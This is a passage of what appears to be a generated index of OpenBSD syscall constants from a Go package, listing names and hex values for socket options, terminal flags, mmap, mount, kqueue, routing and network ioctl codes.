IP_IPSEC_REMOTE_ID = 0x18 constant IP_MAXPACKET (line 955) | IP_MAXPACKET = 0xffff constant IP_MAX_MEMBERSHIPS (line 956) | IP_MAX_MEMBERSHIPS = 0xfff constant IP_MF (line 957) | IP_MF = 0x2000 constant IP_MINTTL (line 958) | IP_MINTTL = 0x20 constant IP_MIN_MEMBERSHIPS (line 959) | IP_MIN_MEMBERSHIPS = 0xf constant IP_MSS (line 960) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 961) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 962) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 963) | IP_MULTICAST_TTL = 0xa constant IP_OFFMASK (line 964) | IP_OFFMASK = 0x1fff constant IP_OPTIONS (line 965) | IP_OPTIONS = 0x1 constant IP_PIPEX (line 966) | IP_PIPEX = 0x22 constant IP_PORTRANGE (line 967) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 968) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 969) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 970) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 971) | IP_RECVDSTADDR = 0x7 constant IP_RECVDSTPORT (line 972) | IP_RECVDSTPORT = 0x21 constant IP_RECVIF (line 973) | IP_RECVIF = 0x1e constant IP_RECVOPTS (line 974) | IP_RECVOPTS = 0x5 constant IP_RECVRETOPTS (line 975) | IP_RECVRETOPTS = 0x6 constant IP_RECVRTABLE (line 976) | IP_RECVRTABLE = 0x23 constant IP_RECVTTL (line 977) | IP_RECVTTL = 0x1f constant IP_RETOPTS (line 978) | IP_RETOPTS = 0x8 constant IP_RF (line 979) | IP_RF = 0x8000 constant IP_RTABLE (line 980) | IP_RTABLE = 0x1021 constant IP_SENDSRCADDR (line 981) | IP_SENDSRCADDR = 0x7 constant IP_TOS (line 982) | IP_TOS = 0x3 constant IP_TTL (line 983) | IP_TTL = 0x4 constant ISIG (line 984) | ISIG = 0x80 constant ISTRIP (line 985) | ISTRIP = 0x20 constant ITIMER_PROF (line 986) | ITIMER_PROF = 0x2 constant ITIMER_REAL (line 987) | ITIMER_REAL = 0x0 constant ITIMER_VIRTUAL (line 988) | ITIMER_VIRTUAL = 0x1 constant IUCLC (line 989) | IUCLC = 0x1000 constant IXANY (line 990) | IXANY = 0x800 constant IXOFF (line 991) | IXOFF = 0x400 constant IXON (line 992) | IXON = 0x200 constant KERN_HOSTNAME (line 993) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 994) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 995) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 996) | KERN_VERSION = 0x4 constant LCNT_OVERLOAD_FLUSH (line 997) | LCNT_OVERLOAD_FLUSH = 0x6 constant LOCK_EX (line 998) | LOCK_EX = 0x2 constant LOCK_NB (line 999) | LOCK_NB = 0x4 constant LOCK_SH (line 1000) | LOCK_SH = 0x1 constant LOCK_UN (line 1001) | LOCK_UN = 0x8 constant MADV_DONTNEED (line 1002) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 1003) | MADV_FREE = 0x6 constant MADV_NORMAL (line 1004) | MADV_NORMAL = 0x0 constant MADV_RANDOM (line 1005) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 1006) | MADV_SEQUENTIAL = 0x2 constant MADV_SPACEAVAIL (line 1007) | MADV_SPACEAVAIL = 0x5 constant MADV_WILLNEED (line 1008) | MADV_WILLNEED = 0x3 constant MAP_ANON (line 1009) | MAP_ANON = 0x1000 constant MAP_ANONYMOUS (line 1010) | MAP_ANONYMOUS = 0x1000 constant MAP_CONCEAL (line 1011) | MAP_CONCEAL = 0x8000 constant MAP_COPY (line 1012) | MAP_COPY = 0x2 constant MAP_FILE (line 1013) | MAP_FILE = 0x0 constant MAP_FIXED (line 1014) | MAP_FIXED = 0x10 constant MAP_FLAGMASK (line 1015) | MAP_FLAGMASK = 0xfff7 constant MAP_HASSEMAPHORE (line 1016) | MAP_HASSEMAPHORE = 0x0 constant MAP_INHERIT (line 1017) | MAP_INHERIT = 0x0 constant MAP_INHERIT_COPY (line 1018) | MAP_INHERIT_COPY = 0x1 constant MAP_INHERIT_NONE (line 1019) | MAP_INHERIT_NONE = 0x2 constant MAP_INHERIT_SHARE (line 1020) | MAP_INHERIT_SHARE = 0x0 constant MAP_INHERIT_ZERO (line 1021) | MAP_INHERIT_ZERO = 0x3 constant MAP_NOEXTEND (line 1022) | MAP_NOEXTEND = 0x0 constant MAP_NORESERVE (line 1023) | MAP_NORESERVE = 0x0 constant MAP_PRIVATE (line 1024) | MAP_PRIVATE = 0x2 constant MAP_RENAME (line 1025) | MAP_RENAME = 0x0 constant MAP_SHARED (line 1026) | MAP_SHARED = 0x1 constant MAP_STACK (line 1027) | MAP_STACK = 0x4000 constant MAP_TRYFIXED (line 1028) | MAP_TRYFIXED = 0x0 constant MCL_CURRENT (line 1029) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 1030) | MCL_FUTURE = 0x2 constant MNT_ASYNC (line 1031) | MNT_ASYNC = 0x40 constant MNT_DEFEXPORTED (line 1032) | MNT_DEFEXPORTED = 0x200 constant MNT_DELEXPORT (line 1033) | MNT_DELEXPORT = 0x20000 constant MNT_DOOMED (line 1034) | MNT_DOOMED = 0x8000000 constant MNT_EXPORTANON (line 1035) | MNT_EXPORTANON = 0x400 constant MNT_EXPORTED (line 1036) | MNT_EXPORTED = 0x100 constant MNT_EXRDONLY (line 1037) | MNT_EXRDONLY = 0x80 constant MNT_FORCE (line 1038) | MNT_FORCE = 0x80000 constant MNT_LAZY (line 1039) | MNT_LAZY = 0x3 constant MNT_LOCAL (line 1040) | MNT_LOCAL = 0x1000 constant MNT_NOATIME (line 1041) | MNT_NOATIME = 0x8000 constant MNT_NODEV (line 1042) | MNT_NODEV = 0x10 constant MNT_NOEXEC (line 1043) | MNT_NOEXEC = 0x4 constant MNT_NOPERM (line 1044) | MNT_NOPERM = 0x20 constant MNT_NOSUID (line 1045) | MNT_NOSUID = 0x8 constant MNT_NOWAIT (line 1046) | MNT_NOWAIT = 0x2 constant MNT_QUOTA (line 1047) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 1048) | MNT_RDONLY = 0x1 constant MNT_RELOAD (line 1049) | MNT_RELOAD = 0x40000 constant MNT_ROOTFS (line 1050) | MNT_ROOTFS = 0x4000 constant MNT_SOFTDEP (line 1051) | MNT_SOFTDEP = 0x4000000 constant MNT_STALLED (line 1052) | MNT_STALLED = 0x100000 constant MNT_SWAPPABLE (line 1053) | MNT_SWAPPABLE = 0x200000 constant MNT_SYNCHRONOUS (line 1054) | MNT_SYNCHRONOUS = 0x2 constant MNT_UPDATE (line 1055) | MNT_UPDATE = 0x10000 constant MNT_VISFLAGMASK (line 1056) | MNT_VISFLAGMASK = 0x400ffff constant MNT_WAIT (line 1057) | MNT_WAIT = 0x1 constant MNT_WANTRDWR (line 1058) | MNT_WANTRDWR = 0x2000000 constant MNT_WXALLOWED (line 1059) | MNT_WXALLOWED = 0x800 constant MOUNT_AFS (line 1060) | MOUNT_AFS = "afs" constant MOUNT_CD9660 (line 1061) | MOUNT_CD9660 = "cd9660" constant MOUNT_EXT2FS (line 1062) | MOUNT_EXT2FS = "ext2fs" constant MOUNT_FFS (line 1063) | MOUNT_FFS = "ffs" constant MOUNT_FUSEFS (line 1064) | MOUNT_FUSEFS = "fuse" constant MOUNT_MFS (line 1065) | MOUNT_MFS = "mfs" constant MOUNT_MSDOS (line 1066) | MOUNT_MSDOS = "msdos" constant MOUNT_NCPFS (line 1067) | MOUNT_NCPFS = "ncpfs" constant MOUNT_NFS (line 1068) | MOUNT_NFS = "nfs" constant MOUNT_NTFS (line 1069) | MOUNT_NTFS = "ntfs" constant MOUNT_TMPFS (line 1070) | MOUNT_TMPFS = "tmpfs" constant MOUNT_UDF (line 1071) | MOUNT_UDF = "udf" constant MOUNT_UFS (line 1072) | MOUNT_UFS = "ffs" constant MSG_BCAST (line 1073) | MSG_BCAST = 0x100 constant MSG_CMSG_CLOEXEC (line 1074) | MSG_CMSG_CLOEXEC = 0x800 constant MSG_CTRUNC (line 1075) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1076) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1077) | MSG_DONTWAIT = 0x80 constant MSG_EOR (line 1078) | MSG_EOR = 0x8 constant MSG_MCAST (line 1079) | MSG_MCAST = 0x200 constant MSG_NOSIGNAL (line 1080) | MSG_NOSIGNAL = 0x400 constant MSG_OOB (line 1081) | MSG_OOB = 0x1 constant MSG_PEEK (line 1082) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 1083) | MSG_TRUNC = 0x10 constant MSG_WAITALL (line 1084) | MSG_WAITALL = 0x40 constant MSG_WAITFORONE (line 1085) | MSG_WAITFORONE = 0x1000 constant MS_ASYNC (line 1086) | MS_ASYNC = 0x1 constant MS_INVALIDATE (line 1087) | MS_INVALIDATE = 0x4 constant MS_SYNC (line 1088) | MS_SYNC = 0x2 constant NAME_MAX (line 1089) | NAME_MAX = 0xff constant NET_RT_DUMP (line 1090) | NET_RT_DUMP = 0x1 constant NET_RT_FLAGS (line 1091) | NET_RT_FLAGS = 0x2 constant NET_RT_IFLIST (line 1092) | NET_RT_IFLIST = 0x3 constant NET_RT_IFNAMES (line 1093) | NET_RT_IFNAMES = 0x6 constant NET_RT_MAXID (line 1094) | NET_RT_MAXID = 0x8 constant NET_RT_SOURCE (line 1095) | NET_RT_SOURCE = 0x7 constant NET_RT_STATS (line 1096) | NET_RT_STATS = 0x4 constant NET_RT_TABLE (line 1097) | NET_RT_TABLE = 0x5 constant NFDBITS (line 1098) | NFDBITS = 0x20 constant NOFLSH (line 1099) | NOFLSH = 0x80000000 constant NOKERNINFO (line 1100) | NOKERNINFO = 0x2000000 constant NOTE_ATTRIB (line 1101) | NOTE_ATTRIB = 0x8 constant NOTE_CHANGE (line 1102) | NOTE_CHANGE = 0x1 constant NOTE_CHILD (line 1103) | NOTE_CHILD = 0x4 constant NOTE_DELETE (line 1104) | NOTE_DELETE = 0x1 constant NOTE_EOF (line 1105) | NOTE_EOF = 0x2 constant NOTE_EXEC (line 1106) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1107) | NOTE_EXIT = 0x80000000 constant NOTE_EXTEND (line 1108) | NOTE_EXTEND = 0x4 constant NOTE_FORK (line 1109) | NOTE_FORK = 0x40000000 constant NOTE_LINK (line 1110) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1111) | NOTE_LOWAT = 0x1 constant NOTE_OOB (line 1112) | NOTE_OOB = 0x4 constant NOTE_PCTRLMASK (line 1113) | NOTE_PCTRLMASK = 0xf0000000 constant NOTE_PDATAMASK (line 1114) | NOTE_PDATAMASK = 0xfffff constant NOTE_RENAME (line 1115) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1116) | NOTE_REVOKE = 0x40 constant NOTE_TRACK (line 1117) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1118) | NOTE_TRACKERR = 0x2 constant NOTE_TRUNCATE (line 1119) | NOTE_TRUNCATE = 0x80 constant NOTE_WRITE (line 1120) | NOTE_WRITE = 0x2 constant OCRNL (line 1121) | OCRNL = 0x10 constant OLCUC (line 1122) | OLCUC = 0x20 constant ONLCR (line 1123) | ONLCR = 0x2 constant ONLRET (line 1124) | ONLRET = 0x80 constant ONOCR (line 1125) | ONOCR = 0x40 constant ONOEOT (line 1126) | ONOEOT = 0x8 constant OPOST (line 1127) | OPOST = 0x1 constant OXTABS (line 1128) | OXTABS = 0x4 constant O_ACCMODE (line 1129) | O_ACCMODE = 0x3 constant O_APPEND (line 1130) | O_APPEND = 0x8 constant O_ASYNC (line 1131) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1132) | O_CLOEXEC = 0x10000 constant O_CREAT (line 1133) | O_CREAT = 0x200 constant O_DIRECTORY (line 1134) | O_DIRECTORY = 0x20000 constant O_DSYNC (line 1135) | O_DSYNC = 0x80 constant O_EXCL (line 1136) | O_EXCL = 0x800 constant O_EXLOCK (line 1137) | O_EXLOCK = 0x20 constant O_FSYNC (line 1138) | O_FSYNC = 0x80 constant O_NDELAY (line 1139) | O_NDELAY = 0x4 constant O_NOCTTY (line 1140) | O_NOCTTY = 0x8000 constant O_NOFOLLOW (line 1141) | O_NOFOLLOW = 0x100 constant O_NONBLOCK (line 1142) | O_NONBLOCK = 0x4 constant O_RDONLY (line 1143) | O_RDONLY = 0x0 constant O_RDWR (line 1144) | O_RDWR = 0x2 constant O_RSYNC (line 1145) | O_RSYNC = 0x80 constant O_SHLOCK (line 1146) | O_SHLOCK = 0x10 constant O_SYNC (line 1147) | O_SYNC = 0x80 constant O_TRUNC (line 1148) | O_TRUNC = 0x400 constant O_WRONLY (line 1149) | O_WRONLY = 0x1 constant PARENB (line 1150) | PARENB = 0x1000 constant PARMRK (line 1151) | PARMRK = 0x8 constant PARODD (line 1152) | PARODD = 0x2000 constant PENDIN (line 1153) | PENDIN = 0x20000000 constant PF_FLUSH (line 1154) | PF_FLUSH = 0x1 constant PRIO_PGRP (line 1155) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1156) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1157) | PRIO_USER = 0x2 constant PROT_EXEC (line 1158) | PROT_EXEC = 0x4 constant PROT_NONE (line 1159) | PROT_NONE = 0x0 constant PROT_READ (line 1160) | PROT_READ = 0x1 constant PROT_WRITE (line 1161) | PROT_WRITE = 0x2 constant RLIMIT_CORE (line 1162) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1163) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 1164) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1165) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1166) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1167) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1168) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1169) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1170) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1171) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 1172) | RTAX_AUTHOR = 0x6 constant RTAX_BFD (line 1173) | RTAX_BFD = 0xb constant RTAX_BRD (line 1174) | RTAX_BRD = 0x7 constant RTAX_DNS (line 1175) | RTAX_DNS = 0xc constant RTAX_DST (line 1176) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1177) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1178) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1179) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1180) | RTAX_IFP = 0x4 constant RTAX_LABEL (line 1181) | RTAX_LABEL = 0xa constant RTAX_MAX (line 1182) | RTAX_MAX = 0xf constant RTAX_NETMASK (line 1183) | RTAX_NETMASK = 0x2 constant RTAX_SEARCH (line 1184) | RTAX_SEARCH = 0xe constant RTAX_SRC (line 1185) | RTAX_SRC = 0x8 constant RTAX_SRCMASK (line 1186) | RTAX_SRCMASK = 0x9 constant RTAX_STATIC (line 1187) | RTAX_STATIC = 0xd constant RTA_AUTHOR (line 1188) | RTA_AUTHOR = 0x40 constant RTA_BFD (line 1189) | RTA_BFD = 0x800 constant RTA_BRD (line 1190) | RTA_BRD = 0x80 constant RTA_DNS (line 1191) | RTA_DNS = 0x1000 constant RTA_DST (line 1192) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1193) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1194) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1195) | RTA_IFA = 0x20 constant RTA_IFP (line 1196) | RTA_IFP = 0x10 constant RTA_LABEL (line 1197) | RTA_LABEL = 0x400 constant RTA_NETMASK (line 1198) | RTA_NETMASK = 0x4 constant RTA_SEARCH (line 1199) | RTA_SEARCH = 0x4000 constant RTA_SRC (line 1200) | RTA_SRC = 0x100 constant RTA_SRCMASK (line 1201) | RTA_SRCMASK = 0x200 constant RTA_STATIC (line 1202) | RTA_STATIC = 0x2000 constant RTF_ANNOUNCE (line 1203) | RTF_ANNOUNCE = 0x4000 constant RTF_BFD (line 1204) | RTF_BFD = 0x1000000 constant RTF_BLACKHOLE (line 1205) | RTF_BLACKHOLE = 0x1000 constant RTF_BROADCAST (line 1206) | RTF_BROADCAST = 0x400000 constant RTF_CACHED (line 1207) | RTF_CACHED = 0x20000 constant RTF_CLONED (line 1208) | RTF_CLONED = 0x10000 constant RTF_CLONING (line 1209) | RTF_CLONING = 0x100 constant RTF_CONNECTED (line 1210) | RTF_CONNECTED = 0x800000 constant RTF_DONE (line 1211) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1212) | RTF_DYNAMIC = 0x10 constant RTF_FMASK (line 1213) | RTF_FMASK = 0x110fc08 constant RTF_GATEWAY (line 1214) | RTF_GATEWAY = 0x2 constant RTF_HOST (line 1215) | RTF_HOST = 0x4 constant RTF_LLINFO (line 1216) | RTF_LLINFO = 0x400 constant RTF_LOCAL (line 1217) | RTF_LOCAL = 0x200000 constant RTF_MODIFIED (line 1218) | RTF_MODIFIED = 0x20 constant RTF_MPATH (line 1219) | RTF_MPATH = 0x40000 constant RTF_MPLS (line 1220) | RTF_MPLS = 0x100000 constant RTF_MULTICAST (line 1221) | RTF_MULTICAST = 0x200 constant RTF_PERMANENT_ARP (line 1222) | RTF_PERMANENT_ARP = 0x2000 constant RTF_PROTO1 (line 1223) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1224) | RTF_PROTO2 = 0x4000 constant RTF_PROTO3 (line 1225) | RTF_PROTO3 = 0x2000 constant RTF_REJECT (line 1226) | RTF_REJECT = 0x8 constant RTF_STATIC (line 1227) | RTF_STATIC = 0x800 constant RTF_UP (line 1228) | RTF_UP = 0x1 constant RTF_USETRAILERS (line 1229) | RTF_USETRAILERS = 0x8000 constant RTM_80211INFO (line 1230) | RTM_80211INFO = 0x15 constant RTM_ADD (line 1231) | RTM_ADD = 0x1 constant RTM_BFD (line 1232) | RTM_BFD = 0x12 constant RTM_CHANGE (line 1233) | RTM_CHANGE = 0x3 constant RTM_CHGADDRATTR (line 1234) | RTM_CHGADDRATTR = 0x14 constant RTM_DELADDR (line 1235) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1236) | RTM_DELETE = 0x2 constant RTM_DESYNC (line 1237) | RTM_DESYNC = 0x10 constant RTM_GET (line 1238) | RTM_GET = 0x4 constant RTM_IFANNOUNCE (line 1239) | RTM_IFANNOUNCE = 0xf constant RTM_IFINFO (line 1240) | RTM_IFINFO = 0xe constant RTM_INVALIDATE (line 1241) | RTM_INVALIDATE = 0x11 constant RTM_LOSING (line 1242) | RTM_LOSING = 0x5 constant RTM_MAXSIZE (line 1243) | RTM_MAXSIZE = 0x800 constant RTM_MISS (line 1244) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1245) | RTM_NEWADDR = 0xc constant RTM_PROPOSAL (line 1246) | RTM_PROPOSAL = 0x13 constant RTM_REDIRECT (line 1247) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1248) | RTM_RESOLVE = 0xb constant RTM_SOURCE (line 1249) | RTM_SOURCE = 0x16 constant RTM_VERSION (line 1250) | RTM_VERSION = 0x5 constant RTV_EXPIRE (line 1251) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1252) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 1253) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1254) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1255) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1256) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1257) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1258) | RTV_SSTHRESH = 0x20 constant RT_TABLEID_BITS (line 1259) | RT_TABLEID_BITS = 0x8 constant RT_TABLEID_MASK (line 1260) | RT_TABLEID_MASK = 0xff constant RT_TABLEID_MAX (line 1261) | RT_TABLEID_MAX = 0xff constant RUSAGE_CHILDREN (line 1262) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1263) | RUSAGE_SELF = 0x0 constant RUSAGE_THREAD (line 1264) | RUSAGE_THREAD = 0x1 constant SCM_RIGHTS (line 1265) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1266) | SCM_TIMESTAMP = 0x4 constant SEEK_CUR (line 1267) | SEEK_CUR = 0x1 constant SEEK_END (line 1268) | SEEK_END = 0x2 constant SEEK_SET (line 1269) | SEEK_SET = 0x0 constant SHUT_RD (line 1270) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1271) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1272) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1273) | SIOCADDMULTI = 0x80206931 constant SIOCAIFADDR (line 1274) | SIOCAIFADDR = 0x8040691a constant SIOCAIFGROUP (line 1275) | SIOCAIFGROUP = 0x80286987 constant SIOCATMARK (line 1276) | SIOCATMARK = 0x40047307 constant SIOCBRDGADD (line 1277) | SIOCBRDGADD = 0x8060693c constant SIOCBRDGADDL (line 1278) | SIOCBRDGADDL = 0x80606949 constant SIOCBRDGADDS (line 1279) | SIOCBRDGADDS = 0x80606941 constant SIOCBRDGARL (line 1280) | SIOCBRDGARL = 0x808c694d constant SIOCBRDGDADDR (line 1281) | SIOCBRDGDADDR = 0x81286947 constant SIOCBRDGDEL (line 1282) | SIOCBRDGDEL = 0x8060693d constant SIOCBRDGDELS (line 1283) | SIOCBRDGDELS = 0x80606942 constant SIOCBRDGFLUSH (line 1284) | SIOCBRDGFLUSH = 0x80606948 constant SIOCBRDGFRL (line 1285) | SIOCBRDGFRL = 0x808c694e constant SIOCBRDGGCACHE (line 1286) | SIOCBRDGGCACHE = 0xc0146941 constant SIOCBRDGGFD (line 1287) | SIOCBRDGGFD = 0xc0146952 constant SIOCBRDGGHT (line 1288) | SIOCBRDGGHT = 0xc0146951 constant SIOCBRDGGIFFLGS (line 1289) | SIOCBRDGGIFFLGS = 0xc060693e constant SIOCBRDGGMA (line 1290) | SIOCBRDGGMA = 0xc0146953 constant SIOCBRDGGPARAM (line 1291) | SIOCBRDGGPARAM = 0xc0406958 constant SIOCBRDGGPRI (line 1292) | SIOCBRDGGPRI = 0xc0146950 constant SIOCBRDGGRL (line 1293) | SIOCBRDGGRL = 0xc030694f constant SIOCBRDGGTO (line 1294) | SIOCBRDGGTO = 0xc0146946 constant SIOCBRDGIFS (line 1295) | SIOCBRDGIFS = 0xc0606942 constant SIOCBRDGRTS (line 1296) | SIOCBRDGRTS = 0xc0206943 constant SIOCBRDGSADDR (line 1297) | SIOCBRDGSADDR = 0xc1286944 constant SIOCBRDGSCACHE (line 1298) | SIOCBRDGSCACHE = 0x80146940 constant SIOCBRDGSFD (line 1299) | SIOCBRDGSFD = 0x80146952 constant SIOCBRDGSHT (line 1300) | SIOCBRDGSHT = 0x80146951 constant SIOCBRDGSIFCOST (line 1301) | SIOCBRDGSIFCOST = 0x80606955 constant SIOCBRDGSIFFLGS (line 1302) | SIOCBRDGSIFFLGS = 0x8060693f constant SIOCBRDGSIFPRIO (line 1303) | SIOCBRDGSIFPRIO = 0x80606954 constant SIOCBRDGSIFPROT (line 1304) | SIOCBRDGSIFPROT = 0x8060694a constant SIOCBRDGSMA (line 1305) | SIOCBRDGSMA = 0x80146953 constant SIOCBRDGSPRI (line 1306) | SIOCBRDGSPRI = 0x80146950 constant SIOCBRDGSPROTO (line 1307) | SIOCBRDGSPROTO = 0x8014695a constant SIOCBRDGSTO (line 1308) | SIOCBRDGSTO = 0x80146945 constant SIOCBRDGSTXHC (line 1309) | SIOCBRDGSTXHC = 0x80146959 constant SIOCDELLABEL (line 1310) | SIOCDELLABEL = 0x80206997 constant SIOCDELMULTI (line 1311) | SIOCDELMULTI = 0x80206932 constant SIOCDIFADDR (line 1312) | SIOCDIFADDR = 0x80206919 constant SIOCDIFGROUP (line 1313) | SIOCDIFGROUP = 0x80286989 constant SIOCDIFPARENT (line 1314) | SIOCDIFPARENT = 0x802069b4 constant SIOCDIFPHYADDR (line 1315) | SIOCDIFPHYADDR = 0x80206949 constant SIOCDPWE3NEIGHBOR (line 1316) | SIOCDPWE3NEIGHBOR = 0x802069de constant SIOCDVNETID (line 1317) | SIOCDVNETID = 0x802069af constant SIOCGETKALIVE (line 1318) | SIOCGETKALIVE = 0xc01869a4 constant SIOCGETLABEL (line 1319) | SIOCGETLABEL = 0x8020699a constant SIOCGETMPWCFG (line 1320) | SIOCGETMPWCFG = 0xc02069ae constant SIOCGETPFLOW (line 1321) | SIOCGETPFLOW = 0xc02069fe constant SIOCGETPFSYNC (line 1322) | SIOCGETPFSYNC = 0xc02069f8 constant SIOCGETSGCNT (line 1323) | SIOCGETSGCNT = 0xc0207534 constant SIOCGETVIFCNT (line 1324) | SIOCGETVIFCNT = 0xc0287533 constant SIOCGETVLAN (line 1325) | SIOCGETVLAN = 0xc0206990 constant SIOCGIFADDR (line 1326) | SIOCGIFADDR = 0xc0206921 constant SIOCGIFBRDADDR (line 1327) | SIOCGIFBRDADDR = 0xc0206923 constant SIOCGIFCONF (line 1328) | SIOCGIFCONF = 0xc0106924 constant SIOCGIFDATA (line 1329) | SIOCGIFDATA = 0xc020691b constant SIOCGIFDESCR (line 1330) | SIOCGIFDESCR = 0xc0206981 constant SIOCGIFDSTADDR (line 1331) | SIOCGIFDSTADDR = 0xc0206922 constant SIOCGIFFLAGS (line 1332) | SIOCGIFFLAGS = 0xc0206911 constant SIOCGIFGATTR (line 1333) | SIOCGIFGATTR = 0xc028698b constant SIOCGIFGENERIC (line 1334) | SIOCGIFGENERIC = 0xc020693a constant SIOCGIFGLIST (line 1335) | SIOCGIFGLIST = 0xc028698d constant SIOCGIFGMEMB (line 1336) | SIOCGIFGMEMB = 0xc028698a constant SIOCGIFGROUP (line 1337) | SIOCGIFGROUP = 0xc0286988 constant SIOCGIFHARDMTU (line 1338) | SIOCGIFHARDMTU = 0xc02069a5 constant SIOCGIFLLPRIO (line 1339) | SIOCGIFLLPRIO = 0xc02069b6 constant SIOCGIFMEDIA (line 1340) | SIOCGIFMEDIA = 0xc0406938 constant SIOCGIFMETRIC (line 1341) | SIOCGIFMETRIC = 0xc0206917 constant SIOCGIFMTU (line 1342) | SIOCGIFMTU = 0xc020697e constant SIOCGIFNETMASK (line 1343) | SIOCGIFNETMASK = 0xc0206925 constant SIOCGIFPAIR (line 1344) | SIOCGIFPAIR = 0xc02069b1 constant SIOCGIFPARENT (line 1345) | SIOCGIFPARENT = 0xc02069b3 constant SIOCGIFPRIORITY (line 1346) | SIOCGIFPRIORITY = 0xc020699c constant SIOCGIFRDOMAIN (line 1347) | SIOCGIFRDOMAIN = 0xc02069a0 constant SIOCGIFRTLABEL (line 1348) | SIOCGIFRTLABEL = 0xc0206983 constant SIOCGIFRXR (line 1349) | SIOCGIFRXR = 0x802069aa constant SIOCGIFSFFPAGE (line 1350) | SIOCGIFSFFPAGE = 0xc1126939 constant SIOCGIFXFLAGS (line 1351) | SIOCGIFXFLAGS = 0xc020699e constant SIOCGLIFPHYADDR (line 1352) | SIOCGLIFPHYADDR = 0xc218694b constant SIOCGLIFPHYDF (line 1353) | SIOCGLIFPHYDF = 0xc02069c2 constant SIOCGLIFPHYECN (line 1354) | SIOCGLIFPHYECN = 0xc02069c8 constant SIOCGLIFPHYRTABLE (line 1355) | SIOCGLIFPHYRTABLE = 0xc02069a2 constant SIOCGLIFPHYTTL (line 1356) | SIOCGLIFPHYTTL = 0xc02069a9 constant SIOCGPGRP (line 1357) | SIOCGPGRP = 0x40047309 constant SIOCGPWE3 (line 1358) | SIOCGPWE3 = 0xc0206998 constant SIOCGPWE3CTRLWORD (line 1359) | SIOCGPWE3CTRLWORD = 0xc02069dc constant SIOCGPWE3FAT (line 1360) | SIOCGPWE3FAT = 0xc02069dd constant SIOCGPWE3NEIGHBOR (line 1361) | SIOCGPWE3NEIGHBOR = 0xc21869de constant SIOCGRXHPRIO (line 1362) | SIOCGRXHPRIO = 0xc02069db constant SIOCGSPPPPARAMS (line 1363) | SIOCGSPPPPARAMS = 0xc0206994 constant SIOCGTXHPRIO (line 1364) | SIOCGTXHPRIO = 0xc02069c6 constant SIOCGUMBINFO (line 1365) | SIOCGUMBINFO = 0xc02069be constant SIOCGUMBPARAM (line 1366) | SIOCGUMBPARAM = 0xc02069c0 constant SIOCGVH (line 1367) | SIOCGVH = 0xc02069f6 constant SIOCGVNETFLOWID (line 1368) | SIOCGVNETFLOWID = 0xc02069c4 constant SIOCGVNETID (line 1369) | SIOCGVNETID = 0xc02069a7 constant SIOCIFAFATTACH (line 1370) | SIOCIFAFATTACH = 0x801169ab constant SIOCIFAFDETACH (line 1371) | SIOCIFAFDETACH = 0x801169ac constant SIOCIFCREATE (line 1372) | SIOCIFCREATE = 0x8020697a constant SIOCIFDESTROY (line 1373) | SIOCIFDESTROY = 0x80206979 constant SIOCIFGCLONERS (line 1374) | SIOCIFGCLONERS = 0xc0106978 constant SIOCSETKALIVE (line 1375) | SIOCSETKALIVE = 0x801869a3 constant SIOCSETLABEL (line 1376) | SIOCSETLABEL = 0x80206999 constant SIOCSETMPWCFG (line 1377) | SIOCSETMPWCFG = 0x802069ad constant SIOCSETPFLOW (line 1378) | 